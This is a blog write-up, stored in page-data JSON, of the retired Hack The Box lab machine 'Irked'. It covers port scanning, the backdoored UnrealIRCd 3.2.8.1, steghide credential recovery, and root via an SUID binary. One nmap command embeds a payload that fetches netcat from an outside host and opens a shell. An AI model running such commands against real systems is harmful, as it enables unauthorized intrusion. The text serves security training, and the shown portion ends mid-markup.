{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-irked-en","result":{"data":{"markdownRemark":{"id":"f00bdbab-6af7-5fa6-a599-bb9b01e3de64","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-irked\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/e91760e3318a63484f72ba7e95b9bd5d/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Irked”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I ran the usual scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.117 $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nPORT    STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">6</span>.7p1 Debian <span class=\"token number\">5</span>+deb8u4 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">1024</span> 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class=\"token punctuation\">(</span>DSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">75</span>:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token 
number\">256</span> c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp  <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.10 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.10 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">)</span>.\n<span class=\"token number\">111</span>/tcp <span class=\"token function\">open</span>  rpcbind <span class=\"token number\">2</span>-4 <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100000)</span>\n<span class=\"token operator\">|</span> rpcinfo: \n<span class=\"token operator\">|</span>   program version    port/proto  <span class=\"token function\">service</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/tcp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/udp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/tcp6  rpcbind\n<span class=\"token 
operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/udp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">32926</span>/tcp6  status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">34772</span>/udp6  status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">36611</span>/tcp   status\n<span class=\"token operator\">|</span>_  <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">55055</span>/udp   status\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Port 111 being open is somewhat unusual.</p>\n<p>Port 111 is used by the rpcbind service.</p>\n<p>Since nmap also ran rpcinfo, I could see which RPC program numbers were open.</p>\n<p>Running the rpcinfo command directly gave slightly more detail than nmap alone.</p>\n<p>NFS did not appear to be running.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ rpcinfo -p <span class=\"token variable\">$RHOST</span>\n   program vers proto   port  <span class=\"token function\">service</span>\n    <span class=\"token number\">100000</span>    <span class=\"token number\">4</span>   tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">3</span>   tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">2</span>   
tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">4</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">3</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">2</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100024</span>    <span class=\"token number\">1</span>   udp  <span class=\"token number\">46043</span>  status\n    <span class=\"token number\">100024</span>    <span class=\"token number\">1</span>   tcp  <span class=\"token number\">39977</span>  status</code></pre></div>\n<p>I got a bit stuck here, but connecting to port 80 displayed the message <code class=\"language-text\">IRC is almost working!</code>.</p>\n<p>A quick search revealed that IRC typically runs on ports around 7000.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 740px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/8ac56/image-20220805223447532.webp 240w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/d3be9/image-20220805223447532.webp 
480w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/ca4a8/image-20220805223447532.webp 740w\"\n              sizes=\"(max-width: 740px) 100vw, 740px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/8ff5a/image-20220805223447532.png 240w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/e85cb/image-20220805223447532.png 480w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png 740w\"\n            sizes=\"(max-width: 740px) 100vw, 740px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png\"\n            alt=\"image-20220805223447532\"\n            title=\"image-20220805223447532\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I scanned all ports.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt\nPORT      STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp    <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">6</span>.7p1 Debian <span class=\"token number\">5</span>+deb8u4 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">1024</span> 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class=\"token punctuation\">(</span>DSA<span 
class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">75</span>:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp    <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.10 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.10 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token number\">111</span>/tcp   <span class=\"token function\">open</span>  rpcbind <span class=\"token number\">2</span>-4 <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100000)</span>\n<span class=\"token operator\">|</span> rpcinfo: \n<span class=\"token operator\">|</span>   program version    port/proto  <span class=\"token function\">service</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/tcp   rpcbind\n<span class=\"token operator\">|</span>   
<span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/udp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/tcp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/udp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">39977</span>/tcp   status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">46043</span>/udp   status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">47929</span>/tcp6  status\n<span class=\"token operator\">|</span>_  <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">51699</span>/udp6  status\n<span class=\"token number\">6697</span>/tcp  <span class=\"token function\">open</span>  irc     UnrealIRCd\n<span class=\"token number\">8067</span>/tcp  <span class=\"token function\">open</span>  irc     UnrealIRCd\n<span class=\"token number\">39977</span>/tcp <span class=\"token function\">open</span>  status  <span class=\"token number\">1</span> <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100024)</span>\n<span class=\"token number\">65534</span>/tcp <span class=\"token function\">open</span>  irc     UnrealIRCd</code></pre></div>\n<p>IRC ports were open on 6697, 8067, and 65534.</p>\n<p>I tried enumerating them first.</p>\n<p>Reference: <a 
href=\"https://nmap.org/nsedoc/scripts/irc-unrealircd-backdoor.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">irc-unrealircd-backdoor NSE script — Nmap Scripting Engine documentation</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -d -p6697 --script<span class=\"token operator\">=</span>irc-unrealircd-backdoor.nse --script-args<span class=\"token operator\">=</span>irc-unrealircd-backdoor.command<span class=\"token operator\">=</span><span class=\"token string\">'wget http://www.javaop.com/~ron/tmp/nc &amp;&amp; chmod +x ./nc &amp;&amp; ./nc -l -p 4444 -e /bin/sh'</span> <span class=\"token variable\">$RHOST</span>\nPORT     STATE SERVICE REASON\n<span class=\"token number\">6697</span>/tcp <span class=\"token function\">open</span>  ircs-u  syn-ack\n<span class=\"token operator\">|</span>_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277\nFinal <span class=\"token builtin class-name\">times</span> <span class=\"token keyword\">for</span> host: srtt: <span class=\"token number\">238054</span> rttvar: <span class=\"token number\">178574</span>  to: <span class=\"token number\">952350</span></code></pre></div>\n<p>Interestingly, <code class=\"language-text\">UnrealIRCd 3.2.8.1</code> is the version that was officially distributed with a backdoor intentionally embedded in it.</p>\n<p>Reference: <a href=\"https://seclists.org/fulldisclosure/2010/Jun/277\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Full Disclosure: Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site</a></p>\n<p>Running the following exploit gave me a reverse shell.</p>\n<p>Reference: <a href=\"https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">UnrealIRCd-3.2.8.1-Backdoor/exploit.py at master · 
Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor · GitHub</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0d703feaafba5051fe2ad0a0c87b84db/8ac56/image-20220805231425537.webp 240w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/d3be9/image-20220805231425537.webp 480w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/d00b9/image-20220805231425537.webp 800w\"\n              sizes=\"(max-width: 800px) 100vw, 800px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0d703feaafba5051fe2ad0a0c87b84db/8ff5a/image-20220805231425537.png 240w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/e85cb/image-20220805231425537.png 480w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png 800w\"\n            sizes=\"(max-width: 800px) 100vw, 800px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n          
  src=\"/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png\"\n            alt=\"image-20220805231425537\"\n            title=\"image-20220805231425537\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>Looking for flags, I found that the user flag was located under the home directory of user <code class=\"language-text\">djmardov</code>.</p>\n<p>The current user <code class=\"language-text\">ircd</code> could not read that file, so I needed to escalate privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">find</span> / -name user.txt <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n/home/djmardov/Documents/user.txt</code></pre></div>\n<p>Running <code class=\"language-text\">history</code> for initial recon showed that <code class=\"language-text\">.backup</code> inside <code class=\"language-text\">/home/djmardov/Documents</code> had been accessed before.</p>\n<p>Printing its contents revealed what appeared to be credential information.</p>\n<p><span\n 
     class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 515px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.499999999999996%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/14d92ed889323e99f49f0e356d8dbcbc/8ac56/image-20220806000018740.webp 240w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/d3be9/image-20220806000018740.webp 480w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/92849/image-20220806000018740.webp 515w\"\n              sizes=\"(max-width: 515px) 100vw, 515px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/14d92ed889323e99f49f0e356d8dbcbc/8ff5a/image-20220806000018740.png 240w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/e85cb/image-20220806000018740.png 480w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png 515w\"\n            sizes=\"(max-width: 515px) 100vw, 515px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png\"\n            alt=\"image-20220806000018740\"\n            title=\"image-20220806000018740\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I was not sure how to use it for a while, but noticing the word “steg” led me to try steganography on the image displayed in the browser.</p>\n<p>Running steghide prompted for a passphrase. Using the credential found in <code class=\"language-text\">.backup</code> yielded the SSH password for user <code class=\"language-text\">djmardov</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 592px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/8ac56/image-20220806083220617.webp 240w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/d3be9/image-20220806083220617.webp 480w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/0be55/image-20220806083220617.webp 592w\"\n              sizes=\"(max-width: 592px) 100vw, 592px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/8ff5a/image-20220806083220617.png 
240w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/e85cb/image-20220806083220617.png 480w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png 592w\"\n            sizes=\"(max-width: 592px) 100vw, 592px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png\"\n            alt=\"image-20220806083220617\"\n            title=\"image-20220806083220617\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>With that, I obtained the user flag.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>I started by running linpeas.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> /home/kali/Hacking/Tools/linpeas.sh djmardov@<span class=\"token variable\">$RHOST</span>:/home/djmardov\n\n$ ./linpeas.sh -a <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> linpeas.txt</code></pre></div>\n<p>The output showed an SMTP process running on the local address.</p>\n<div class=\"gatsby-highlight\" 
data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token number\">25</span>/tcp  <span class=\"token function\">open</span>  smtp    Exim smtpd\n<span class=\"token operator\">|</span> smtp-commands: irked Hello localhost <span class=\"token punctuation\">[</span><span class=\"token number\">127.0</span>.0.1<span class=\"token punctuation\">]</span>, SIZE <span class=\"token number\">52428800</span>, 8BITMIME, PIPELINING, HELP, \n<span class=\"token operator\">|</span>_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP </code></pre></div>\n<p>Banner grabbing confirmed it was running <code class=\"language-text\">SMTP Exim 4.84_2</code>.</p>\n<p>The exim4 process was running as root.</p>\n<p>I tried a range of exploits for this but unfortunately none of them worked.</p>\n<p>Going back to linpeas, I noticed a binary at <code class=\"language-text\">/usr/bin/viewuser</code> that had the SUID bit set, and it appeared to allow executing an arbitrary shell script with root privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Interesting Files ╠════════════════════════════════════\n<span class=\"token comment\">#</span>\n SUID - Check easy privesc, exploits and <span class=\"token function\">write</span> perms\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#sudo-and-suid</span>\n-rwsr-xr-x <span class=\"token number\">1</span> root root <span class=\"token number\">7</span>.2K May <span class=\"token number\">16</span>  <span class=\"token number\">2018</span> /usr/bin/viewuser <span class=\"token punctuation\">(</span>Unknown SUID binary<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Using this binary to invoke a shell gave me root privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: 
relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 27.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93a32e641e2dc216a3d1bad21d163c78/8ac56/image-20220806113215646.webp 240w,\n/static/93a32e641e2dc216a3d1bad21d163c78/d3be9/image-20220806113215646.webp 480w,\n/static/93a32e641e2dc216a3d1bad21d163c78/f91b9/image-20220806113215646.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93a32e641e2dc216a3d1bad21d163c78/8ff5a/image-20220806113215646.png 